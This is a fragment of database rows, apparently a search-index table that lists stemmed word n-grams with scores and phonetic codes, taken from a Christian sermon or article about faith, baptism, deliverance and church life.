(273078, 'in or push', 'in or push', 0, 1, 1.3333, 'I5612', 1, '*'),
(273079, 'in the church', 'in the church', 0, 1, 1.4333, 'I53262', 1, '*'),
(273080, 'in the first', 'in the first', 0, 1, 1.4, 'I531623', 1, '*'),
(273081, 'in their faith', 'in their faith', 0, 1, 1.4667, 'I53613', 1, '*'),
(273082, 'in their word', 'in their word', 0, 1, 1.4333, 'I5363', 1, '*'),
(273083, 'in these modern', 'in these modern', 0, 1, 1.5, 'I5325365', 1, '*'),
(273084, 'in this war', 'in this war', 0, 1, 1.3667, 'I5326', 1, '*'),
(273085, 'in tongues and', 'in tongues and', 0, 1, 1.4667, 'I535253', 1, '*'),
(273086, 'in tongues is', 'in tongues is', 0, 1, 1.4333, 'I5352', 1, '*'),
(273087, 'in tongues you', 'in tongues you', 0, 1, 1.4667, 'I5352', 1, '*'),
(273088, 'in your generation', 'in your generation', 0, 1, 1.6, 'I5625635', 1, '*'),
(273089, 'include baptism', 'includ baptism', 0, 1, 1.5, 'I52431325', 1, '*'),
(273090, 'include baptism into', 'includ baptism into', 0, 1, 1.6667, 'I524313253', 1, '*'),
(273091, 'increasingly', 'increasingli', 0, 0, 0.8, 'I5262524', 1, '*'),
(273092, 'increasingly confused', 'increasingli confused', 0, 1, 1.7, 'I526252425123', 1, '*'),
(273093, 'increasingly confused individuals', 'increasingli confused individuals', 0, 1, 2, 'I526252425123531342', 1, '*'),
(273094, 'individuals', 'individu', 0, 0, 0.7333, 'I531342', 2, '*'),
(273095, 'international', 'intern', 0, 0, 0.8667, 'I5365354', 1, '*'),
(273096, 'international church', 'intern church', 0, 1, 1.6667, 'I5365354262', 1, '*'),
(273097, 'international church one', 'intern church one', 0, 1, 1.8, 'I53653542625', 1, '*'),
(273098, 'into a new', 'into a new', 0, 1, 1.3333, 'I535', 1, '*'),
(273099, 'into christ', 'into christ', 0, 1, 1.3667, 'I532623', 1, '*'),
(273100, 'into christ the', 'into christ the', 0, 1, 1.5, 'I532623', 1, '*'),
(273101, 'is another', 'is another', 0, 1, 1.3333, 'I2536', 1, '*'),
(273102, 'is another matter', 'is another matter', 0, 1, 1.5667, 'I2536536', 1, '*'),
(273103, 'is as', 'is as', 0, 1, 1.1667, 'I200', 2, '*'),
(273104, 'is as a', 'is as a', 0, 1, 1.2333, 'I200', 1, '*'),
(273105, 'is certain', 'is certain', 0, 1, 1.3333, 'I2635', 1, '*'),
(273106, 'is certain in', 'is certain in', 0, 1, 1.4333, 'I2635', 1, '*'),
(273107, 'is directly determined', 'is directly determined', 0, 1, 1.7333, 'I2362343653', 1, '*'),
(273108, 'is important because', 'is important because', 0, 1, 1.6667, 'I251635312', 1, '*'),
(273109, 'is one area', 'is one area', 0, 1, 1.3667, 'I256', 1, '*'),
(273110, 'is one thing', 'is one thing', 0, 1, 1.4, 'I25352', 1, '*'),
(273111, 'is that every', 'is that every', 0, 1, 1.4333, 'I2316', 1, '*'),
(273112, 'is to serve', 'is to serve', 0, 1, 1.3667, 'I23261', 2, '*'),
(273113, 'is to spread', 'is to spread', 0, 1, 1.4, 'I232163', 1, '*'),
(273114, 'is widespread', 'is widespread', 0, 1, 1.4333, 'I232163', 1, '*'),
(273115, 'is widespread ignorance', 'is widespread ignorance', 0, 1, 1.7667, 'I23216325652', 1, '*'),
(273116, 'is yourcore', 'is yourcore', 0, 1, 1.3667, 'I2626', 1, '*'),
(273117, 'is yourcore assignment', 'is yourcore assignment', 0, 1, 1.7333, 'I2626253', 1, '*'),
(273118, 'it doesn\'t stop', 'it doesn stop', 0, 1, 1.5, 'I3253231', 1, '*'),
(273119, 'it equips', 'it equips', 0, 1, 1.3, 'I3212', 1, '*'),
(273120, 'it equips you', 'it equips you', 0, 1, 1.4333, 'I3212', 1, '*'),
(273121, 'it fast', 'it fast', 0, 1, 1.2333, 'I3123', 1, '*'),
(273122, 'it fast this', 'it fast this', 0, 1, 1.4, 'I31232', 1, '*'),
(273123, 'it gives', 'it gives', 0, 1, 1.2667, 'I3212', 1, '*'),
(273124, 'it gives the', 'it gives the', 0, 1, 1.4, 'I32123', 1, '*'),
(273125, 'it givesyou', 'it givesyou', 0, 1, 1.3667, 'I3212', 1, '*'),
(273126, 'it givesyou romans', 'it givesyou romans', 0, 1, 1.6, 'I3212652', 1, '*'),
(273127, 'it has reached', 'it has reached', 0, 1, 1.4667, 'I32623', 1, '*'),
(273128, 'it puts', 'it puts', 0, 1, 1.2333, 'I3132', 1, '*'),
(273129, 'it puts you', 'it puts you', 0, 1, 1.3667, 'I3132', 1, '*'),
(273130, 'it shall not', 'it shall not', 0, 1, 1.4, 'I32453', 1, '*'),
(273131, 'it\'s doctrines', 'it doctrines', 0, 1, 1.4667, 'I32323652', 1, '*'),
(273132, 'it\'s doctrines like', 'it doctrines like', 0, 1, 1.6333, 'I3232365242', 1, '*'),
(273133, 'item 19', 'item 19', 0, 1, 1.2333, 'I350', 1, '*'),
(273134, 'item 19 correct', 'item 19 correct', 0, 1, 1.5, 'I352623', 1, '*'),
(273135, 'jesus said', 'jesu said', 0, 1, 1.3333, 'J300', 1, '*'),
(273136, 'jesus said we', 'jesu said we', 0, 1, 1.4333, 'J300', 1, '*'),
(273137, 'job or meet', 'job or meet', 0, 1, 1.3667, 'J1653', 1, '*'),
(273138, 'just happen', 'just happen', 0, 1, 1.3667, 'J315', 1, '*'),
(273139, 'just happen automatically', 'just happen automatically', 0, 1, 1.8333, 'J31535324', 1, '*'),
(273140, 'just walk', 'just walk', 0, 1, 1.3, 'J342', 1, '*'),
(273141, 'just walk up', 'just walk up', 0, 1, 1.4, 'J3421', 1, '*'),
(273142, 'k2 item 19', 'k2 item 19', 0, 1, 1.3333, 'K350', 1, '*'),
(273143, 'kill the', 'kill the', 0, 1, 1.2667, 'K430', 1, '*'),
(273144, 'kill the enemy', 'kill the enemy', 0, 1, 1.4667, 'K435', 1, '*'),
(273145, 'kingdom of darkness', 'kingdom of darkness', 0, 1, 1.6333, 'K5235136252', 1, '*'),
(273146, 'know thy', 'know thy', 0, 1, 1.2667, 'K530', 1, '*'),
(273147, 'know thy works', 'know thy works', 0, 1, 1.4667, 'K5362', 1, '*'),
(273148, 'know what the', 'know what the', 0, 1, 1.4333, 'K530', 1, '*'),
(273149, 'knowing how', 'know how', 0, 1, 1.3667, 'K520', 1, '*'),
(273150, 'knowing how to', 'know how to', 0, 1, 1.4667, 'K523', 1, '*'),
(273151, 'knowing most', 'know most', 0, 1, 1.4, 'K52523', 1, '*'),
(273152, 'knowing most christians', 'know most christians', 0, 1, 1.7667, 'K52523262352', 1, '*'),
(273153, 'lay', 'lai', 0, 0, 0.2, 'L000', 1, '*'),
(273154, 'lay hands', 'lai hands', 0, 1, 1.3, 'L532', 1, '*'),
(273155, 'lay hands on', 'lai hands on', 0, 1, 1.4, 'L5325', 1, '*'),
(273156, 'learnt', 'learnt', 0, 0, 0.4, 'L653', 1, '*'),
(273157, 'learnt enough', 'learnt enough', 0, 1, 1.4333, 'L65352', 1, '*'),
(273158, 'learnt enough from', 'learnt enough from', 0, 1, 1.6, 'L65352165', 1, '*'),
(273159, 'let\'s have', 'let have', 0, 1, 1.3333, 'L321', 1, '*'),
(273160, 'let\'s have a', 'let have a', 0, 1, 1.4, 'L321', 1, '*'),
(273161, 'level faith', 'level faith', 0, 1, 1.3667, 'L1413', 1, '*'),
(273162, 'level faith and', 'level faith and', 0, 1, 1.5, 'L141353', 1, '*'),
(273163, 'level of faith', 'level of faith', 0, 1, 1.4667, 'L1413', 2, '*'),
(273164, 'life oasis', 'life oasis', 0, 1, 1.3333, 'L120', 1, '*'),
(273165, 'life oasis international', 'life oasis international', 0, 1, 1.8, 'L125365354', 1, '*'),
(273166, 'like a soldier', 'like a soldier', 0, 1, 1.4667, 'L2436', 1, '*'),
(273167, 'like this that', 'like this that', 0, 1, 1.4667, 'L2323', 1, '*'),
(273168, 'loggerheads', 'loggerhead', 0, 0, 0.7333, 'L2632', 1, '*'),
(273169, 'loggerheads with', 'loggerhead with', 0, 1, 1.5333, 'L26323', 1, '*'),
(273170, 'loggerheads with god', 'loggerhead with god', 0, 1, 1.6667, 'L2632323', 1, '*'),
(273171, 'long time and', 'long time and', 0, 1, 1.4333, 'L52353', 1, '*'),
(273172, 'losing ground', 'lose ground', 0, 1, 1.4333, 'L252653', 1, '*'),
(273173, 'losing ground to', 'lose ground to', 0, 1, 1.5333, 'L252653', 1, '*'),
(273174, 'losing it', 'lose it', 0, 1, 1.3, 'L2523', 1, '*'),
(273175, 'losing it fast', 'lose it fast', 0, 1, 1.4667, 'L2523123', 1, '*'),
(273176, 'lot of christians', 'lot of christians', 0, 1, 1.5667, 'L31262352', 1, '*'),
(273177, 'lukewarm christianity', 'lukewarm christianity', 0, 1, 1.7, 'L265262353', 1, '*'),
(273178, 'lukewarm christianity it\'s', 'lukewarm christianity it', 0, 1, 1.8667, 'L2652623532', 1, '*'),
(273179, 'major problems', 'major problems', 0, 1, 1.4667, 'M26161452', 1, '*'),
(273180, 'major problems facing', 'major problems facing', 0, 1, 1.7, 'M261614521252', 1, '*'),
(273181, 'many a tool', 'mani a tool', 0, 1, 1.3667, 'M340', 1, '*'),
(273182, 'many spiritual', 'mani spiritual', 0, 1, 1.4667, 'M21634', 1, '*'),
(273183, 'many spiritual responsibilities', 'mani spiritual responsibilities', 0, 1, 2, 'M21634621521432', 1, '*'),
(273184, 'mark chapter', 'mark chapter', 0, 1, 1.4, 'M62136', 1, '*'),
(273185, 'mark chapter 16', 'mark chapter 16', 0, 1, 1.5, 'M62136', 1, '*'),
(273186, 'mark\'s', 'mark', 0, 0, 0.4, 'M620', 1, '*'),
(273187, 'mark\'s account', 'mark account', 0, 1, 1.4667, 'M6253', 1, '*'),
(273188, 'mark\'s account you', 'mark account you', 0, 1, 1.6, 'M6253', 1, '*'),
(273189, 'matter entirely', 'matter entirely', 0, 1, 1.5, 'M365364', 1, '*'),
(273190, 'matter entirely however', 'matter entirely however', 0, 1, 1.7667, 'M36536416', 1, '*'),
(273191, 'matthew\'s', 'matthew', 0, 0, 0.6, 'M320', 1, '*'),
(273192, 'matthew\'s account', 'matthew account', 0, 1, 1.5667, 'M3253', 1, '*'),
(273193, 'matthew\'s account jesus', 'matthew account jesus', 0, 1, 1.7667, 'M32532', 1, '*'),
(273194, 'me just', 'me just', 0, 1, 1.2333, 'M230', 1, '*'),
(273195, 'me just walk', 'me just walk', 0, 1, 1.4, 'M2342', 1, '*'),
(273196, 'means you should', 'mean you should', 0, 1, 1.5333, 'M243', 1, '*'),
(273197, 'meet a', 'meet a', 0, 1, 1.2, 'M300', 1, '*'),
(273198, 'meet a demon', 'meet a demon', 0, 1, 1.4, 'M350', 1, '*'),
(273199, 'member a', 'member a', 0, 1, 1.2667, 'M160', 1, '*'),
(273200, 'member a minister', 'member a minister', 0, 1, 1.5667, 'M165236', 1, '*'),
(273201, 'men for', 'men for', 0, 1, 1.2333, 'M160', 2, '*'),
(273202, 'men for a', 'men for a', 0, 1, 1.3, 'M160', 1, '*'),
(273203, 'messenger', 'messeng', 0, 0, 0.6, 'M2526', 1, '*'),
(273204, 'messenger of', 'messeng of', 0, 1, 1.4, 'M25261', 1, '*'),
(273205, 'messenger of the', 'messeng of the', 0, 1, 1.5333, 'M252613', 1, '*'),
(273206, 'minister the', 'minist the', 0, 1, 1.4, 'M2363', 1, '*'),
(273207, 'minister the basic', 'minist the basic', 0, 1, 1.6, 'M236312', 1, '*'),
(273208, 'miracles but', 'miracl but', 0, 1, 1.4, 'M624213', 1, '*'),
(273209, 'miracles but they', 'miracl but they', 0, 1, 1.5667, 'M624213', 1, '*'),
(273210, 'miraculous', 'miracul', 0, 0, 0.6667, 'M6242', 1, '*'),
(273211, 'miraculous shown', 'miracul shown', 0, 1, 1.5333, 'M62425', 1, '*'),
(273212, 'miraculous shown here', 'miracul shown here', 0, 1, 1.7, 'M624256', 1, '*'),
(273213, 'mixtures part 1', 'mixtur part 1', 0, 1, 1.5, 'M2362163', 1, '*'),
(273214, 'modern', 'modern', 0, 0, 0.4, 'M365', 1, '*'),
(273215, 'modern times', 'modern times', 0, 1, 1.4, 'M365352', 1, '*'),
(273216, 'modern times we', 'modern times we', 0, 1, 1.5, 'M365352', 1, '*'),
(273217, 'money fame', 'monei fame', 0, 1, 1.3333, 'M150', 1, '*'),
(273218, 'money fame and', 'monei fame and', 0, 1, 1.4667, 'M153', 1, '*'),
(273219, 'more time watching', 'more time watching', 0, 1, 1.6, 'M6353252', 1, '*'),
(273220, 'most christians are', 'most christians are', 0, 1, 1.6333, 'M232623526', 1, '*'),
(273221, 'most christians have', 'most christians have', 0, 1, 1.6667, 'M232623521', 1, '*'),
(273222, 'move into a', 'move into a', 0, 1, 1.3667, 'M153', 1, '*'),
(273223, 'must be competent', 'must be competent', 0, 1, 1.5667, 'M231251353', 1, '*'),
(273224, 'must develop', 'must develop', 0, 1, 1.4, 'M23141', 2, '*'),
(273225, 'must develop your', 'must develop your', 0, 1, 1.5667, 'M231416', 1, '*'),
(273226, 'must have a', 'must have a', 0, 1, 1.3667, 'M231', 1, '*'),
(273227, 'must not fail', 'must not fail', 0, 1, 1.4333, 'M235314', 1, '*'),
(273228, 'my church', 'my church', 0, 1, 1.3, 'M262', 1, '*'),
(273229, 'my church the', 'my church the', 0, 1, 1.4333, 'M2623', 1, '*'),
(273230, 'name and teach', 'name and teach', 0, 1, 1.4667, 'N320', 1, '*'),
(273231, 'nations but', 'nation but', 0, 1, 1.3667, 'N35213', 1, '*'),
(273232, 'nations but it', 'nation but it', 0, 1, 1.4667, 'N35213', 1, '*'),
(273233, 'nations this', 'nation this', 0, 1, 1.4, 'N35232', 1, '*'),
(273234, 'nations this is', 'nation this is', 0, 1, 1.5, 'N35232', 1, '*'),
(273235, 'nations this means', 'nation this means', 0, 1, 1.6, 'N3523252', 1, '*'),
(273236, 'nearest', 'nearest', 0, 0, 0.4667, 'N623', 1, '*'),
(273237, 'nearest hospital', 'nearest hospital', 0, 1, 1.5333, 'N6232134', 1, '*'),
(273238, 'nearest hospital and', 'nearest hospital and', 0, 1, 1.6667, 'N623213453', 1, '*'),
(273239, 'negotiation', 'negoti', 0, 0, 0.7333, 'N235', 1, '*'),
(273240, 'negotiation you', 'negoti you', 0, 1, 1.5, 'N235', 1, '*'),
(273241, 'negotiation you must', 'negoti you must', 0, 1, 1.6667, 'N23523', 1, '*'),
(273242, 'neither cold', 'neither cold', 0, 1, 1.4, 'N36243', 1, '*'),
(273243, 'neither cold nor', 'neither cold nor', 0, 1, 1.5333, 'N3624356', 1, '*'),
(273244, 'new area', 'new area', 0, 1, 1.2667, 'N600', 1, '*'),
(273245, 'new area start', 'new area start', 0, 1, 1.4667, 'N62363', 1, '*'),
(273246, 'new birth', 'new birth', 0, 1, 1.3, 'N163', 1, '*'),
(273247, 'new birth holy', 'new birth holy', 0, 1, 1.4667, 'N1634', 1, '*'),
(273248, 'new christians', 'new christians', 0, 1, 1.4667, 'N262352', 1, '*'),
(273249, 'new christians to', 'new christians to', 0, 1, 1.5667, 'N2623523', 1, '*'),
(273250, 'new job', 'new job', 0, 1, 1.2333, 'N210', 1, '*'),
(273251, 'new job or', 'new job or', 0, 1, 1.3333, 'N216', 1, '*'),
(273252, 'new testament', 'new testament', 0, 1, 1.4333, 'N32353', 1, '*'),
(273253, 'new testament this', 'new testament this', 0, 1, 1.6, 'N323532', 1, '*'),
(273254, 'news to', 'new to', 0, 1, 1.2333, 'N230', 1, '*'),
(273255, 'news to the', 'new to the', 0, 1, 1.3667, 'N230', 1, '*'),
(273256, 'nor hot', 'nor hot', 0, 1, 1.2333, 'N630', 1, '*'),
(273257, 'nor hot i', 'nor hot i', 0, 1, 1.3, 'N630', 1, '*'),
(273258, 'not fail god', 'not fail god', 0, 1, 1.4, 'N31423', 1, '*'),
(273259, 'not hurt', 'not hurt', 0, 1, 1.2667, 'N363', 1, '*'),
(273260, 'not hurt us', 'not hurt us', 0, 1, 1.3667, 'N3632', 1, '*'),
(273261, 'not the first', 'not the first', 0, 1, 1.4333, 'N31623', 1, '*'),
(273262, 'now and you', 'now and you', 0, 1, 1.3667, 'N300', 1, '*'),
(273263, 'now that a', 'now that a', 0, 1, 1.3333, 'N300', 1, '*'),
(273264, 'oasis', 'oasi', 0, 0, 0.3333, 'O200', 1, '*'),
(273265, 'oasis international', 'oasi international', 0, 1, 1.6333, 'O25365354', 1, '*'),
(273266, 'oasis international church', 'oasi international church', 0, 1, 1.8667, 'O25365354262', 1, '*'),
(273267, 'observe all', 'observ all', 0, 1, 1.3667, 'O12614', 1, '*'),
(273268, 'observe all the', 'observ all the', 0, 1, 1.5, 'O126143', 1, '*'),
(273269, 'obsessed', 'obsess', 0, 0, 0.5333, 'O123', 1, '*'),
(273270, 'obsessed with', 'obsess with', 0, 1, 1.4333, 'O123', 1, '*'),
(273271, 'obsessed with and', 'obsess with and', 0, 1, 1.5667, 'O12353', 1, '*'),
(273272, 'of a steady', 'of a steady', 0, 1, 1.3667, 'O123', 1, '*'),
(273273, 'of an identity', 'of an identity', 0, 1, 1.4667, 'O15353', 1, '*'),
(273274, 'of baptism', 'of baptism', 0, 1, 1.3333, 'O1325', 1, '*'),
(273275, 'of baptism these', 'of baptism these', 0, 1, 1.5333, 'O132532', 1, '*'),
(273276, 'of christians acts', 'of christians acts', 0, 1, 1.6, 'O126235232', 1, '*'),
(273277, 'of christians and', 'of christians and', 0, 1, 1.5667, 'O126235253', 1, '*'),
(273278, 'of christians come', 'of christians come', 0, 1, 1.6, 'O12623525', 1, '*'),
(273279, 'of darkness', 'of darkness', 0, 1, 1.3667, 'O136252', 1, '*'),
(273280, 'of darkness sadly', 'of darkness sadly', 0, 1, 1.5667, 'O13625234', 1, '*'),
(273281, 'of men', 'of men', 0, 1, 1.2, 'O150', 1, '*'),
(273282, 'of men for', 'of men for', 0, 1, 1.3333, 'O1516', 1, '*'),
(273283, 'of our philosophies', 'of our philosophies', 0, 1, 1.6333, 'O1614212', 1, '*'),
(273284, 'of the advantage', 'of the advantage', 0, 1, 1.5333, 'O131532', 1, '*'),
(273285, 'of the commandments', 'of the commandments', 0, 1, 1.6333, 'O13253532', 1, '*'),
(273286, 'of the concepts', 'of the concepts', 0, 1, 1.5, 'O13252132', 1, '*'),
(273287, 'of the good', 'of the good', 0, 1, 1.3667, 'O1323', 1, '*'),
(273288, 'of the life', 'of the life', 0, 1, 1.3667, 'O1341', 1, '*'),
(273289, 'of the major', 'of the major', 0, 1, 1.4, 'O13526', 1, '*'),
(273290, 'of the miraculous', 'of the miraculous', 0, 1, 1.5667, 'O1356242', 1, '*'),
(273291, 'of the sheepfold', 'of the sheepfold', 0, 1, 1.5333, 'O132143', 1, '*'),
(273292, 'of this is', 'of this is', 0, 1, 1.3333, 'O132', 1, '*'),
(273293, 'of understanding', 'of understanding', 0, 1, 1.5333, 'O1536235352', 1, '*'),
(273294, 'of understanding for', 'of understanding for', 0, 1, 1.6667, 'O153623535216', 1, '*'),
(273295, 'old and', 'old and', 0, 1, 1.2333, 'O4353', 1, '*'),
(273296, 'old and new', 'old and new', 0, 1, 1.3667, 'O43535', 1, '*'),
(273297, 'on earth is', 'on earth is', 0, 1, 1.3667, 'O5632', 1, '*'),
(273298, 'on obsessed', 'on obsessed', 0, 1, 1.3667, 'O5123', 1, '*'),
(273299, 'on obsessed with', 'on obsessed with', 0, 1, 1.5333, 'O5123', 1, '*'),
(273300, 'on sunday', 'on sunday', 0, 1, 1.3, 'O5253', 1, '*'),
(273301, 'on sunday the', 'on sunday the', 0, 1, 1.4333, 'O5253', 1, '*'),
(273302, 'on the pastors', 'on the pastors', 0, 1, 1.4667, 'O5312362', 1, '*'),
(273303, 'on the sick', 'on the sick', 0, 1, 1.3667, 'O532', 1, '*'),
(273304, 'one area', 'on area', 0, 1, 1.2667, 'O560', 1, '*'),
(273305, 'one area i\'m', 'on area i', 0, 1, 1.4, 'O565', 1, '*'),
(273306, 'one of our', 'on of our', 0, 1, 1.3333, 'O516', 1, '*'),
(273307, 'one thing understanding', 'on thing understanding', 0, 1, 1.7667, 'O5352536235352', 1, '*'),
(273308, 'operate at', 'oper at', 0, 1, 1.3333, 'O163', 1, '*'),
(273309, 'operate at a', 'oper at a', 0, 1, 1.4, 'O163', 1, '*'),
(273310, 'operate his', 'oper his', 0, 1, 1.3667, 'O1632', 1, '*'),
(273311, 'operate his weaponry', 'oper his weaponry', 0, 1, 1.6667, 'O1632156', 1, '*'),
(273312, 'operations without', 'oper without', 0, 1, 1.6, 'O163523', 1, '*'),
(273313, 'operations without negotiation', 'oper without negotiation', 0, 1, 2, 'O1635235235', 1, '*'),
(273314, 'or hot', 'or hot', 0, 1, 1.2, 'O630', 1, '*'),
(273315, 'or hot revelation', 'or hot revelation', 0, 1, 1.5667, 'O6361435', 1, '*'),
(273316, 'or meet', 'or meet', 0, 1, 1.2333, 'O653', 1, '*'),
(273317, 'or meet a', 'or meet a', 0, 1, 1.3, 'O653', 1, '*'),
(273318, 'or places', 'or places', 0, 1, 1.3, 'O6142', 1, '*'),
(273319, 'or places is', 'or places is', 0, 1, 1.4, 'O6142', 1, '*'),
(273320, 'or push', 'or push', 0, 1, 1.2333, 'O612', 1, '*'),
(273321, 'or push on', 'or push on', 0, 1, 1.3333, 'O6125', 1, '*'),
(273322, 'order to walk', 'order to walk', 0, 1, 1.4333, 'O636342', 1, '*'),
(273323, 'others also', 'other also', 0, 1, 1.3667, 'O36242', 1, '*'),
(273324, 'others also you', 'other also you', 0, 1, 1.5, 'O36242', 1, '*'),
(273325, 'our philosophies', 'our philosophies', 0, 1, 1.5333, 'O614212', 1, '*'),
(273326, 'our philosophies is', 'our philosophies is', 0, 1, 1.6333, 'O614212', 1, '*'),
(273327, 'out and put', 'out and put', 0, 1, 1.3667, 'O35313', 1, '*'),
(273328, 'out devils', 'out devils', 0, 1, 1.3333, 'O3142', 1, '*'),
(273329, 'out devils 2', 'out devils 2', 0, 1, 1.4, 'O3142', 1, '*'),
(273330, 'out devils from', 'out devils from', 0, 1, 1.5, 'O3142165', 1, '*'),
(273331, 'out of an', 'out of an', 0, 1, 1.3, 'O315', 1, '*'),
(273332, 'out the following', 'out the following', 0, 1, 1.5667, 'O31452', 1, '*'),
(273333, 'part 1', 'part 1', 0, 1, 1.2, 'P630', 1, '*'),
(273334, 'part 1 romans', 'part 1 romans', 0, 1, 1.4333, 'P63652', 1, '*'),
(273335, 'pass through', 'pass through', 0, 1, 1.4, 'P2362', 1, '*'),
(273336, 'pass through what', 'pass through what', 0, 1, 1.5667, 'P23623', 1, '*'),
(273337, 'pastor your', 'pastor your', 0, 1, 1.3667, 'P236', 1, '*'),
(273338, 'pastor your bible', 'pastor your bible', 0, 1, 1.5667, 'P23614', 1, '*'),
(273339, 'pastors alone', 'pastor alone', 0, 1, 1.4333, 'P236245', 1, '*'),
(273340, 'pastors alone a', 'pastor alone a', 0, 1, 1.5, 'P236245', 1, '*'),
(273341, 'people anywhere', 'peopl anywhere', 0, 1, 1.5, 'P456', 1, '*'),
(273342, 'people anywhere you', 'peopl anywhere you', 0, 1, 1.6333, 'P456', 1, '*'),
(273343, 'people are losing', 'peopl are losing', 0, 1, 1.5667, 'P464252', 1, '*'),
(273344, 'people or', 'peopl or', 0, 1, 1.3, 'P460', 1, '*'),
(273345, 'people or places', 'peopl or places', 0, 1, 1.5333, 'P46142', 1, '*'),
(273346, 'percent', 'percent', 0, 0, 0.4667, 'P6253', 1, '*'),
(273347, 'percent sure', 'percent sure', 0, 1, 1.4, 'P625326', 1, '*'),
(273348, 'percent sure the', 'percent sure the', 0, 1, 1.5333, 'P6253263', 1, '*'),
(273349, 'person the', 'person the', 0, 1, 1.3333, 'P6253', 1, '*'),
(273350, 'person the devil', 'person the devil', 0, 1, 1.5333, 'P625314', 1, '*'),
(273351, 'person to pass', 'person to pass', 0, 1, 1.4667, 'P625312', 1, '*'),
(273352, 'philosophies', 'philosophi', 0, 0, 0.8, 'P4212', 1, '*'),
(273353, 'philosophies is', 'philosophi is', 0, 1, 1.5, 'P4212', 1, '*'),
(273354, 'philosophies is that', 'philosophi is that', 0, 1, 1.6667, 'P42123', 1, '*'),
(273355, 'place of understanding', 'place of understanding', 0, 1, 1.7333, 'P421536235352', 1, '*'),
(273356, 'place which', 'place which', 0, 1, 1.3667, 'P420', 1, '*'),
(273357, 'place which is', 'place which is', 0, 1, 1.4667, 'P420', 1, '*'),
(273358, 'places is', 'place is', 0, 1, 1.3, 'P420', 1, '*'),
(273359, 'places is like', 'place is like', 0, 1, 1.4667, 'P4242', 1, '*'),
(273360, 'plague today\'s christian', 'plagu today christian', 0, 1, 1.8, 'P42326235', 1, '*'),
(273361, 'point now', 'point now', 0, 1, 1.3, 'P535', 1, '*'),
(273362, 'point now that', 'point now that', 0, 1, 1.4667, 'P5353', 1, '*'),
(273363, 'point where', 'point where', 0, 1, 1.3667, 'P536', 1, '*'),
(273364, 'point where they', 'point where they', 0, 1, 1.5333, 'P5363', 1, '*'),
(273365, 'possessed person', 'possess person', 0, 1, 1.5333, 'P231625', 1, '*'),
(273366, 'possessed person the', 'possess person the', 0, 1, 1.6667, 'P2316253', 1, '*'),
(273367, 'powerful tool', 'power tool', 0, 1, 1.4333, 'P61434', 1, '*'),
(273368, 'powerful tool for', 'power tool for', 0, 1, 1.5667, 'P6143416', 1, '*'),
(273369, 'pray through', 'prai through', 0, 1, 1.4, 'P6362', 1, '*'),
(273370, 'pray through you', 'prai through you', 0, 1, 1.5333, 'P6362', 1, '*'),
(273371, 'precepts', 'precept', 0, 0, 0.5333, 'P62132', 2, '*'),
(273372, 'precepts of', 'precept of', 0, 1, 1.3667, 'P621321', 1, '*'),
(273373, 'precepts of baptism', 'precept of baptism', 0, 1, 1.6333, 'P621321325', 1, '*'),
(273374, 'problem i', 'problem i', 0, 1, 1.3, 'P6145', 1, '*'),
(273375, 'problem i believe', 'problem i believe', 0, 1, 1.5667, 'P6145141', 1, '*'),
(273376, 'problems facing', 'problem facing', 0, 1, 1.5, 'P614521252', 1, '*'),
(273377, 'problems facing today\'s', 'problem facing today', 0, 1, 1.7667, 'P61452125232', 1, '*'),
(273378, 'produce christians', 'produc christians', 0, 1, 1.6, 'P63262352', 1, '*'),
(273379, 'produce christians who', 'produc christians who', 0, 1, 1.7333, 'P63262352', 1, '*'),
(273380, 'proper behavior', 'proper behavior', 0, 1, 1.5, 'P61616', 1, '*'),
(273381, 'proper behavior dressing', 'proper behavior dressing', 0, 1, 1.8, 'P6161636252', 1, '*'),
(273382, 'properly let\'s', 'properli let', 0, 1, 1.4667, 'P616432', 1, '*'),
(273383, 'properly let\'s have', 'properli let have', 0, 1, 1.6333, 'P6164321', 1, '*'),
(273384, 'pulpit', 'pulpit', 0, 0, 0.4, 'P413', 2, '*'),
(273385, 'pulpit alike', 'pulpit alike', 0, 1, 1.4, 'P41342', 1, '*'),
(273386, 'pulpit alike giving', 'pulpit alike giving', 0, 1, 1.6333, 'P41342152', 1, '*'),
(273387, 'purpose proper', 'purpos proper', 0, 1, 1.4667, 'P6121616', 1, '*'),
(273388, 'purpose proper behavior', 'purpos proper behavior', 0, 1, 1.7667, 'P612161616', 1, '*'),
(273389, 'push', 'push', 0, 0, 0.2667, 'P200', 1, '*'),
(273390, 'push on', 'push on', 0, 1, 1.2333, 'P250', 1, '*'),
(273391, 'push on the', 'push on the', 0, 1, 1.3667, 'P253', 1, '*'),
(273392, 'put a stop', 'put a stop', 0, 1, 1.3333, 'P3231', 1, '*'),
(273393, 'puts you', 'put you', 0, 1, 1.2667, 'P320', 1, '*'),
(273394, 'puts you at', 'put you at', 0, 1, 1.3667, 'P323', 1, '*'),
(273395, 'quiet', 'quiet', 0, 0, 0.3333, 'Q300', 1, '*'),
(273396, 'quiet time', 'quiet time', 0, 1, 1.3333, 'Q350', 1, '*'),
(273397, 'quiet time they', 'quiet time they', 0, 1, 1.5, 'Q353', 1, '*'),
(273398, 'reached', 'reach', 0, 0, 0.4667, 'R230', 1, '*'),
(273399, 'reached the', 'reach the', 0, 1, 1.3667, 'R230', 1, '*'),
(273400, 'reached the point', 'reach the point', 0, 1, 1.5667, 'R23153', 1, '*'),
(273401, 'real reason', 'real reason', 0, 1, 1.3667, 'R4625', 1, '*'),
(273402, 'real reason why', 'real reason why', 0, 1, 1.5, 'R4625', 1, '*'),
(273403, 'reason why', 'reason why', 0, 1, 1.3333, 'R250', 2, '*'),
(273404, 'reason why they', 'reason why they', 0, 1, 1.5, 'R253', 1, '*'),
(273405, 'recover', 'recov', 0, 0, 0.4667, 'R216', 2, '*'),
(273406, 'recover these', 'recov these', 0, 1, 1.4333, 'R21632', 1, '*'),
(273407, 'recover these are', 'recov these are', 0, 1, 1.5667, 'R216326', 1, '*'),
(273408, 'referring to us', 'refer to us', 0, 1, 1.5, 'R165232', 1, '*'),
(273409, 'remaining requirements', 'remain requirements', 0, 1, 1.7333, 'R52626532', 1, '*'),
(273410, 'remaining requirements that', 'remain requirements that', 0, 1, 1.9, 'R526265323', 1, '*'),
(273411, 'representatives', 'repres', 0, 0, 1, 'R1625312', 1, '*'),
(273412, 'representatives on', 'repres on', 0, 1, 1.6, 'R16253125', 1, '*'),
(273413, 'representatives on the', 'repres on the', 0, 1, 1.7333, 'R162531253', 1, '*'),
(273414, 'requirements', 'requir', 0, 0, 0.8, 'R26532', 1, '*'),
(273415, 'requirements that', 'requir that', 0, 1, 1.5667, 'R265323', 1, '*'),
(273416, 'requirements that are', 'requir that are', 0, 1, 1.7, 'R2653236', 1, '*'),
(273417, 'requires that', 'requir that', 0, 1, 1.4333, 'R2623', 2, '*'),
